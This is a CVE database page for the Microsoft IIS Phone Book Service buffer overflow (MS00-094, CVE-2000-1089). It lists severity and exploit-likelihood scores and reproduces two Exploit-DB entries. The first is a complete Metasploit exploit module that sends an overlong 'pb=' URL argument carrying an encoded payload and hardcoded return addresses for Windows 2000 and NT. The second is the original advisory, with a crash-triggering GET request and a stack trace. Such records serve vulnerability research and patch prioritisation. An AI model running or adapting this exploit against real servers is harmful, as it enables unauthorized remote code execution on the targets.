Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
10 |
|
AV:N/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 16357
Publication date : 2010-04-29 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: ms00_094_pbserver.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft IIS Phone Book Service Overflow',
'Description' => %q{
This is an exploit for the Phone Book Service /pbserver/pbserver.dll
described in MS00-094. By sending an overly long URL argument
for phone book updates, it is possible to overwrite the stack. This
module has only been tested against Windows 2000 SP1.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2000-1089' ],
[ 'OSVDB', '463' ],
[ 'BID', '2048' ],
[ 'MSB', 'MS00-094' ],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 896,
'BadChars' => "\x00\x0a\x0d\x20%&=?",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
['Windows 2000 SP1', { 'Ret' => 0x77e8898b }], # jmp esp kernel32.dll
['Windows 2000 SP0', { 'Ret' => 0x77ea162b }], # call esp kernel32.dll
['Windows NT SP6', { 'Ret' => 0x77f32836 }], # jmp esp kernel32.dll
],
'DisclosureDate' => 'Dec 04 2000',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URL', [ true, "The path to pbserver.dll", "/pbserver/pbserver.dll" ]),
], self.class)
end
def check
print_status("Requesting the vulnerable ISAPI path...")
res = send_request_raw({
'uri' => datastore['URL']
}, 5)
if (res and res.code == 400)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
print_status("Sending overflow...")
res = send_request_raw({
'uri' => datastore['URL'] + '?&&&&&&pb=' + payload.encoded + [target['Ret']].pack('V') + make_nops(8) + Rex::Arch::X86.jmp(-912)
}, 5)
handler
end
end
Exploit Database EDB-ID : 20460
Publication date : 2000-12-03 23h00 +00:00
Author : Alberto Solino
EDB Verified : Yes
source: https://www.securityfocus.com/bid/2048/info
The Phone Book Service is an optional component that ships with the NT 4 Option Pack and Windows 2000. It is not installed by default.
A buffer overflow vulnerability was discovered in the URL processing routines of the Phone Book Service requests on IIS 4 and IIS 5. If exploited, this vulnerability allows an attacker to execute arbitrary code and obtain a remote command shell with those privileges of the IUSR_machinename account (IIS 4) or the IWAM_machinename account (IIS 5).
The Phone Book server services requests using the Internet Information Services 5.0 with URIs such as http://hostname/pbserver/
According to Microsoft's documentation a DLL (PBSERVER.DLL) is exported and the services can be used making requests with the following format:
http://hostname/pbserver/pbserver.dll?osarch=&ostype=&osver=&cmver=&lcid=&pb
ver=&pb=<STRING=db name>
In the DLL checks the total lenght to ensure that request does not exceed
1024 bytes, however it is
possible to overflow a local variable of fixed length in the DLL by sending
a request with
the following form:
GET /pbserver/pbserver.dll?&&&&&&pb=AAAAAA... (less than 980 chars)
HTTP/1.0\n\n
The result is an exception reported in the Event log with source WAM like
the following:
The HTTP server encountered an unhandled exception while processing the
ISAPI Application '
+ 0x41414143
+ 0x41414139
pbserver!HttpExtensionProc + 0x1C
wam!DllGetClassObject + 0x808
RPCRT4!NdrServerInitialize + 0x4DB
RPCRT4!NdrStubCall2 + 0x586
RPCRT4!CStdStubBuffer_Invoke + 0xC1
ole32!StgGetIFillLockBytesOnFile + 0x116EC
ole32!StgGetIFillLockBytesOnFile + 0x12415
ole32!DcomChannelSetHResult + 0xDF0
ole32!DcomChannelSetHResult + 0xD35
ole32!StgGetIFillLockBytesOnFile + 0x122AD
ole32!StgGetIFillLockBytesOnFile + 0x1210A
ole32!StgGetIFillLockBytesOnFile + 0x11E22
RPCRT4!NdrServerInitialize + 0x745
RPCRT4!NdrServerInitialize + 0x652
RPCRT4!NdrServerInitialize + 0x578
RPCRT4!RpcSmDestroyClientContext + 0x9E
RPCRT4!NdrConformantArrayFree + 0x8A5
RPCRT4!NdrConformantArrayFree + 0x3FC
RPCRT4!RpcBindingSetOption + 0x395
RPCRT4!RpcBindingSetOption + 0x18E
RPCRT4!RpcBindingSetOption + 0x4F8
KERNEL32!CreateFileA + 0x11B
For additional information specific to this message please visit the Microsoft Online Support site located at: http://www.microsoft.com/contentredirect.asp.
By sending a carefully crafted HTTP request an attacker can bypass the total length check and overflow a local variable in PBSERVER.DLL allowing the execution of arbitrary code as user GUEST on the vulnerable machine.
Products Mentioned
Configuraton 0
Microsoft>>Windows_2000 >> Version *
Microsoft>>Windows_nt >> Version 4.0
References